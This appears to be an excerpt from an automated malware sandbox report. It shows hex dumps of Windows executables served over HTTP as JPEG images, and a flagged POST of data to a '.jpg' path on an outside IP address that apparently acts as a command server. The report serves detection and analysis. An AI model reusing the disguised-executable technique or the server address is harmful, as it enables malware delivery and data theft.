00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx Date: Fri, 11 Jun 2021 04:32:00 GMT Content-Type: image/jpeg Content-Length: 645592 Connection: keep-alive Keep-Alive: timeout=60 Last-Modified: Sun, 06 Aug 2017 19:52:20 GMT ETag: "9d9d8-5561b116cc500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00
                    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx Date: Fri, 11 Jun 2021 04:32:01 GMT Content-Type: image/jpeg Content-Length: 334288 Connection: keep-alive Keep-Alive: timeout=60 Last-Modified: Thu, 06 Jun 2019 04:00:58 GMT ETag: "519d0-58a9fc2e87280" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx Date: Fri, 11 Jun 2021 04:32:01 GMT Content-Type: image/jpeg Content-Length: 137168 Connection: keep-alive Keep-Alive: timeout=60 Last-Modified: Thu, 06 Jun 2019 04:01:20 GMT ETag: "217d0-58a9fc4382400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx Date: Fri, 11 Jun 2021 04:32:02 GMT Content-Type: image/jpeg Content-Length: 440120 Connection: keep-alive Keep-Alive: timeout=60 Last-Modified: Thu, 06 Jun 2019 04:01:30 GMT ETag: "6b738-58a9fc4d0ba80" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx Date: Fri, 11 Jun 2021 04:32:02 GMT Content-Type: image/jpeg Content-Length: 1246160 Connection: keep-alive Keep-Alive: timeout=60 Last-Modified: Thu, 06 Jun 2019 04:01:44 GMT ETag: "1303d0-58a9fc5a65a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx Date: Fri, 11 Jun 2021 04:32:04 GMT Content-Type: image/jpeg Content-Length: 83784 Connection: keep-alive Keep-Alive: timeout=60 Last-Modified: Thu, 06 Jun 2019 04:02:02 GMT ETag: "14748-58a9fc6b90280" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Posts data to a JPG file (protocol mismatch)Show sources
                    Source: unknownHTTP traffic detected: POST /tsc//6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 51.222.56.151Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 11 Jun 2021 04:31:59 GMTContent-Type: image/jpegContent-Length: 144848Connection: keep-aliveKeep-Alive: timeout=60Last-Modified: Thu, 06 Jun 2019 04:01:52 GMTETag: "235d0-58a9fc6206c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 